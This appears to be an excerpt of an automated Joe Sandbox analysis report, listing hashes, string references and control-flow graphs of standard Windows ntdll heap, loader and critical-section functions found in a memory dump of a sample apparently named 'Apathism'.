                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 41830c13c1e7b383d1a4c8be9b8dc8ef4cc0bc11bd440facec9691d5d7c38269
                          • Instruction ID: d193c865e6ac5f705ee97888a062a72d8dcc56f1c93b9068e231525893748805
                          • Opcode Fuzzy Hash: 41830c13c1e7b383d1a4c8be9b8dc8ef4cc0bc11bd440facec9691d5d7c38269
                          • Instruction Fuzzy Hash: E951CCB6A00316BFDF10DB9889D0A7EF7B8FB49200B148269E5A5D7645D278DF50CBA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1183 223e2410-223e2433 1184 223e24ec-223e24ff 1183->1184 1185 223e2439-223e243d 1183->1185 1187 223e2513-223e2515 1184->1187 1188 223e2501-223e250a 1184->1188 1185->1184 1186 223e2443-223e2447 1185->1186 1186->1184 1189 223e244d-223e2451 1186->1189 1191 223e2517-223e251b 1187->1191 1188->1187 1190 223e250c 1188->1190 1189->1184 1192 223e2457-223e245b 1189->1192 1190->1187 1193 223e251d-223e252c 1191->1193 1194 223e2538-223e253e 1191->1194 1192->1184 1195 223e2461-223e2468 1192->1195 1196 223e252e-223e2536 1193->1196 1197 223e2540 1193->1197 1198 223e2543-223e2547 1194->1198 1199 223e246a-223e2471 1195->1199 1200 223e24b6-223e24be 1195->1200 1196->1198 1197->1198 1198->1191 1201 223e2549-223e2556 1198->1201 1203 223e2484 1199->1203 1204 223e2473-223e247b 1199->1204 1200->1184 1202 223e24c0-223e24c4 1200->1202 1205 223e2558-223e2562 1201->1205 1206 223e2564 1201->1206 1202->1184 1208 223e24c6-223e24ea call 22380510 1202->1208 1210 223e2489-223e24ab call 22380510 1203->1210 1204->1184 1209 223e247d-223e2482 1204->1209 1207 223e2567-223e2569 1205->1207 1206->1207 1211 223e258d-223e258f 1207->1211 1212 223e256b-223e256d 1207->1212 1221 223e24ae-223e24b1 1208->1221 1209->1210 1210->1221 1217 223e25ae-223e25d0 call 22380510 1211->1217 1218 223e2591-223e2593 1211->1218 1212->1211 1215 223e256f-223e258b call 22380510 1212->1215 1228 223e25d3-223e25df 1215->1228 1217->1228 1218->1217 1222 223e2595-223e25ab call 22380510 1218->1222 1227 223e2615-223e2619 1221->1227 1222->1217 1228->1207 1230 223e25e1-223e25e4 1228->1230 1231 223e25e6-223e2610 call 22380510 1230->1231 1232 223e2613 1230->1232 1231->1232 1232->1227
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 8254fdab85f228779e24007dbd6dd07f606cc2551fa0cc3f53be5f5baf3ed0c9
                          • Instruction ID: 2c27238f69da286328536735fd00cd3f98e73746f0f65be73946107c31feb6a9
                          • Opcode Fuzzy Hash: 8254fdab85f228779e24007dbd6dd07f606cc2551fa0cc3f53be5f5baf3ed0c9
                          • Instruction Fuzzy Hash: 6751E575A00755AEDB20CF5CCA9097FF7F8BF44200B008559E49BDB682E6B4EE48CB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1432 2240a670-2240a6e9 call 22342410 * 2 RtlDebugPrintTimes 1438 2240a89f-2240a8c4 call 223425b0 * 2 call 22374c30 1432->1438 1439 2240a6ef-2240a6fa 1432->1439 1441 2240a724 1439->1441 1442 2240a6fc-2240a709 1439->1442 1446 2240a728-2240a734 1441->1446 1444 2240a70b-2240a70d 1442->1444 1445 2240a70f-2240a715 1442->1445 1444->1445 1448 2240a7f3-2240a7f5 1445->1448 1449 2240a71b-2240a722 1445->1449 1450 2240a741-2240a743 1446->1450 1452 2240a81f-2240a821 1448->1452 1449->1446 1453 2240a745-2240a747 1450->1453 1454 2240a736-2240a73c 1450->1454 1455 2240a755-2240a77d RtlDebugPrintTimes 1452->1455 1456 2240a827-2240a834 1452->1456 1453->1452 1458 2240a74c-2240a750 1454->1458 1459 2240a73e 1454->1459 1455->1438 1470 2240a783-2240a7a0 RtlDebugPrintTimes 1455->1470 1461 2240a836-2240a843 1456->1461 1462 2240a85a-2240a866 1456->1462 1460 2240a86c-2240a86e 1458->1460 1459->1450 1460->1452 1465 2240a845-2240a849 1461->1465 1466 2240a84b-2240a851 1461->1466 1467 2240a87b-2240a87d 1462->1467 1465->1466 1471 2240a857 1466->1471 1472 2240a96b-2240a96d 1466->1472 1468 2240a870-2240a876 1467->1468 1469 2240a87f-2240a881 1467->1469 1474 2240a8c7-2240a8cb 1468->1474 1475 2240a878 1468->1475 1473 2240a883-2240a889 1469->1473 1470->1438 1480 2240a7a6-2240a7cc RtlDebugPrintTimes 1470->1480 1471->1462 1472->1473 1476 2240a8d0-2240a8f4 RtlDebugPrintTimes 1473->1476 1477 2240a88b-2240a89d RtlDebugPrintTimes 1473->1477 1479 2240a99f-2240a9a1 1474->1479 1475->1467 1476->1438 1483 2240a8f6-2240a913 RtlDebugPrintTimes 1476->1483 1477->1438 1480->1438 1485 2240a7d2-2240a7d4 1480->1485 1483->1438 1490 2240a915-2240a944 RtlDebugPrintTimes 1483->1490 1487 2240a7d6-2240a7e3 1485->1487 1488 2240a7f7-2240a80a 1485->1488 1491 2240a7e5-2240a7e9 1487->1491 1492 2240a7eb-2240a7f1 1487->1492 1489 2240a817-2240a819 1488->1489 1493 2240a81b-2240a81d 1489->1493 1494 2240a80c-2240a812 1489->1494 1490->1438 1498 2240a94a-2240a94c 1490->1498 1491->1492 1492->1448 1492->1488 1493->1452 1495 2240a814 1494->1495 1496 2240a868-2240a86a 1494->1496 1495->1489 1496->1460 1499 2240a972-2240a985 1498->1499 1500 2240a94e-2240a95b 1498->1500 1503 2240a992-2240a994 1499->1503 1501 2240a963-2240a969 1500->1501 1502 2240a95d-2240a961 1500->1502 1501->1472 1501->1499 1502->1501 1504 2240a996 1503->1504 1505 2240a987-2240a98d 1503->1505 1504->1469 1506 2240a99b-2240a99d 1505->1506 1507 2240a98f 1505->1507 1506->1479 1507->1503
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: HEAP:
                          • API String ID: 3446177414-2466845122
                          • Opcode ID: 0af833e25db28ac702f31973b3a7f1589bf7cf82720458505d3fd8b3c334fa1a
                          • Instruction ID: 73507f044d85e3edfd4da44b6e55241a5e1436061b3856e319588df6ec6275a9
                          • Opcode Fuzzy Hash: 0af833e25db28ac702f31973b3a7f1589bf7cf82720458505d3fd8b3c334fa1a
                          • Instruction Fuzzy Hash: BCA1A172A043218FD709CF19C490A1AB7E5BF88354F154A7EEA45DB311EB74EE82CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1508 22367630-22367651 1509 22367653-2236766f call 2233e660 1508->1509 1510 2236768b-22367699 call 22374c30 1508->1510 1515 223a4638 1509->1515 1516 22367675-22367682 1509->1516 1520 223a463f-223a4645 1515->1520 1517 22367684 1516->1517 1518 2236769a-223676a9 call 22367818 1516->1518 1517->1510 1524 22367701-2236770a 1518->1524 1525 223676ab-223676c1 call 223677cd 1518->1525 1522 223676c7-223676d0 call 22367728 1520->1522 1523 223a464b-223a46b8 call 223bf290 call 22379020 RtlDebugPrintTimes BaseQueryModuleData 1520->1523 1522->1524 1533 223676d2 1522->1533 1523->1522 1542 223a46be-223a46c6 1523->1542 1528 223676d8-223676e1 1524->1528 1525->1520 1525->1522 1535 223676e3-223676f2 call 2236771b 1528->1535 1536 2236770c-2236770e 1528->1536 1533->1528 1537 223676f4-223676f6 1535->1537 1536->1537 1540 22367710-22367719 1537->1540 1541 223676f8-223676fa 1537->1541 1540->1541 1541->1517 1544 223676fc 1541->1544 1542->1522 1545 223a46cc-223a46d3 1542->1545 1547 223a47be-223a47d0 call 22372c50 1544->1547 1545->1522 1546 223a46d9-223a46e4 1545->1546 1548 223a46ea-223a4723 call 223bf290 call 2237aaa0 1546->1548 1549 223a47b9 call 22374d48 1546->1549 1547->1517 1557 223a473b-223a476b call 223bf290 1548->1557 1558 223a4725-223a4736 call 223bf290 1548->1558 1549->1547 1557->1522 1563 223a4771-223a477f call 2237a770 1557->1563 1558->1524 1566 223a4781-223a4783 1563->1566 1567 223a4786-223a47a3 call 223bf290 call 223acf9e 1563->1567 1566->1567 1567->1522 1572 223a47a9-223a47b2 1567->1572 1572->1563 1573 223a47b4 1572->1573 1573->1522
                          Strings
                          • ExecuteOptions, xrefs: 223A46A0
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 223A4725
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 223A46FC
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 223A4787
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 223A4742
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 223A4655
                          • Execute=1, xrefs: 223A4713
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: 08f389e2bc7e86f695684c2a4cd22cd6a3d412f7cedb20b59290a706a34ccb41
                          • Instruction ID: 22aaffeac37f151a568dfce6a9bdde184160bd3d01d10d53af930cb664286db5
                          • Opcode Fuzzy Hash: 08f389e2bc7e86f695684c2a4cd22cd6a3d412f7cedb20b59290a706a34ccb41
                          • Instruction Fuzzy Hash: 74514631A003096AEF249FA4DD95FFE77BCEF18304F4001A9EA05AB195EB709A41CB64
                          Strings
                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 223979D0, 223979F5
                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 223979D5
                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 223979FA
                          • Actx , xrefs: 22397A0C, 22397A73
                          • SsHd, xrefs: 2234A3E4
                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 22397AE6
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                          • API String ID: 0-1988757188
                          • Opcode ID: 815289848eafa585ff9adf044348ba6d7ef0b9ed20cced689498546405decd7c
                          • Instruction ID: d634353c8290388adfa40e206eb370dabbc0d260fa997f397466723b7e11ad49
                          • Opcode Fuzzy Hash: 815289848eafa585ff9adf044348ba6d7ef0b9ed20cced689498546405decd7c
                          • Instruction Fuzzy Hash: F9E1D370A043018FD710CF24C9A4B5A77E5BF89358F104AADE9A5CB3D2EB39DA45DB42
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                          • API String ID: 3446177414-1745908468
                          • Opcode ID: 7154e7b65a8b6a995a267f761c348cd9db8059a44e2a91a6ba2c0ecfec096a14
                          • Instruction ID: 4b8389c0b7f1a6858297a1a16dd2590177178f861a9e45fd1322a99f60ebc74b
                          • Opcode Fuzzy Hash: 7154e7b65a8b6a995a267f761c348cd9db8059a44e2a91a6ba2c0ecfec096a14
                          • Instruction Fuzzy Hash: 5591DB37A00B40DFDB16CFA8C480BA9BBF2FF59718F148159E855AB662CB359A41CB14
                          APIs
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 22389AC5, 22389B06
                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 22389AF6
                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 22389AB4
                          • LdrpLoadShimEngine, xrefs: 22389ABB, 22389AFC
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-3589223738
                          • Opcode ID: 73a28f08da26126a46bbac1e22b228c183456bc50cffdf42b681a79f97257dc7
                          • Instruction ID: e197f092e6fb5b2c7b4c9da39a5a946111f16e00f10eda9c60aa99b5932bbee8
                          • Opcode Fuzzy Hash: 73a28f08da26126a46bbac1e22b228c183456bc50cffdf42b681a79f97257dc7
                          • Instruction Fuzzy Hash: 4C510531B007589FDB28CBA9CC98F9D77B5BF54304F054A29E941AF29ADBB49D40CB90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: @3B"$LdrpUnloadNode$Unmapping DLL "%wZ"$dfB"@3B"@3B"$minkernel\ntdll\ldrsnap.c
                          • API String ID: 3446177414-1438501669
                          • Opcode ID: bac65ef923cf665081017a83726e6480198c8a89de8eb8f2f81dc15dedecf653
                          • Instruction ID: 4a0d304fd14d45636bd74f9b85d25e6f88bc1177e76d14165e69791167cb6a1e
                          • Opcode Fuzzy Hash: bac65ef923cf665081017a83726e6480198c8a89de8eb8f2f81dc15dedecf653
                          • Instruction Fuzzy Hash: 3E51F0317007029BD734DF25C980F29B7E5BB98314F000B6DE99A9B296DB78A924CBD1
                          APIs
                          • RtlDebugPrintTimes.NTDLL ref: 2235D959
                            • Part of subcall function 22334859: RtlDebugPrintTimes.NTDLL ref: 223348F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-1975516107
                          • Opcode ID: 89871eff9f67881fc23862271dd90512296298416a68f8a372af44a276c23d46
                          • Instruction ID: 2607dbb6cf8a264a44c00345506f3c13cf2118afab58fdcda8ddaae32bdc658e
                          • Opcode Fuzzy Hash: 89871eff9f67881fc23862271dd90512296298416a68f8a372af44a276c23d46
                          • Instruction Fuzzy Hash: E9511771E00349DFDB18CFA5C580B8DBBF1FF49718F154659E809AB285DB78A991CB80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                          • API String ID: 3446177414-3224558752
                          • Opcode ID: 6bc5a9232dd730f657bb1859532f61f6ba7bc252d4c69c1f31868e1659700896
                          • Instruction ID: ef91068d4134e98541c9485f6a651586c5c47b65d0abb34284c2f48fabc668df
                          • Opcode Fuzzy Hash: 6bc5a9232dd730f657bb1859532f61f6ba7bc252d4c69c1f31868e1659700896
                          • Instruction Fuzzy Hash: 96415671600B44DFD312CF24C584F9AB7F9EF4A768F108669E94697792CF38A980CB91
                          APIs
                          Strings
                          • Entry Heap Size , xrefs: 223DF26D
                          • ---------------------------------------, xrefs: 223DF279
                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 223DF263
                          • HEAP: , xrefs: 223DF15D
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                          • API String ID: 3446177414-1102453626
                          • Opcode ID: 31117f45cd248438e96be20ccff33333b2d935097064f2ee9f905ad6ba585ace
                          • Instruction ID: ca2d19b14caf28fdcc05ffe1ddc2cf3cfeb054a4d208c21b5d5230bf5b614a86
                          • Opcode Fuzzy Hash: 31117f45cd248438e96be20ccff33333b2d935097064f2ee9f905ad6ba585ace
                          • Instruction Fuzzy Hash: D941893B610715DFC708CF96C980A55BBF6FF8935472686AAD818DB315DB31AE02CB80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                          • API String ID: 3446177414-1222099010
                          • Opcode ID: b30f80c20eb80729bdfad9c939b7b1975e0385583c1e35af2d2a0571b47a26a3
                          • Instruction ID: 6b2b8f96f7edfb4acb8fd3de8f44c20dcbbb5b9a696ba678adc24859cc1c7a36
                          • Opcode Fuzzy Hash: b30f80c20eb80729bdfad9c939b7b1975e0385583c1e35af2d2a0571b47a26a3
                          • Instruction Fuzzy Hash: 89313C35104B84DFE322CB24C544F9977F9EF06794F004655F85697652CFB9AE80C761
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                          • Instruction ID: f4c8b739c6c323c4f3277f6a0a084b0f8b1648d33f6580cd9988cdde87ad06c7
                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                          • Instruction Fuzzy Hash: D281D270E053899FDF14CF68C991BEEBBB7AF45364F14421AD961A7292C73C9940CB60
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$@
                          • API String ID: 3446177414-1194432280
                          • Opcode ID: 70d57780a520d79f8523e1554a1e23007fd2d6024cabf111d3f999b80bbc286e
                          • Instruction ID: d428ec486f07bb814ccc634ac89e633e1eecfd9784d72e9e20a3a59d6aefc4a3
                          • Opcode Fuzzy Hash: 70d57780a520d79f8523e1554a1e23007fd2d6024cabf111d3f999b80bbc286e
                          • Instruction Fuzzy Hash: AD811972D01769DBDB318F54CD44BEAB7B8BB09754F0041EAAA19B7280D7709E85CFA0
                          APIs
                          Strings
                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 223A362F
                          • LdrpFindDllActivationContext, xrefs: 223A3636, 223A3662
                          • Querying the active activation context failed with status 0x%08lx, xrefs: 223A365C
                          • minkernel\ntdll\ldrsnap.c, xrefs: 223A3640, 223A366C
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                          • API String ID: 3446177414-3779518884
                          • Opcode ID: f6b525b07faee7acd3dfdf9f83ae329c1e109c43425fee88ad1449089a2bea8f
                          • Instruction ID: 35a727b113c4c02fda1cdbeace934b82f33e7f961133cfa89e4a6a310b8d3614
                          • Opcode Fuzzy Hash: f6b525b07faee7acd3dfdf9f83ae329c1e109c43425fee88ad1449089a2bea8f
                          • Instruction Fuzzy Hash: F6310822E00751AEDB359B44CA88B7977ACAB01778F028267EB055716FDB60DD80C79D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          • Opcode ID: 38697a6a36a95c2ae9972d4d7bbe273ae869558ad99bab706538cd515c297fe0
                          • Instruction ID: b297ca88140c273937ba93796a0991f9c275d98c818680d3b9901bd954e6725e
                          • Opcode Fuzzy Hash: 38697a6a36a95c2ae9972d4d7bbe273ae869558ad99bab706538cd515c297fe0
                          • Instruction Fuzzy Hash: 582165B6A00329ABDB10DF79CD40AEE77F8FF54744F440116E90AE7201E771DA068BA1
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 223A02BD
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 223A02E7
                          • RTL: Re-Waiting, xrefs: 223A031E
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: 0cd37389ff8eac9ec140be38b97a421a4fab18d66e83711d2b0fd1dbbe537571
                          • Instruction ID: 6d2060c7450bbd15ae69750c189820f5105e4e0aaa93a97810026c97e697d5ba
                          • Opcode Fuzzy Hash: 0cd37389ff8eac9ec140be38b97a421a4fab18d66e83711d2b0fd1dbbe537571
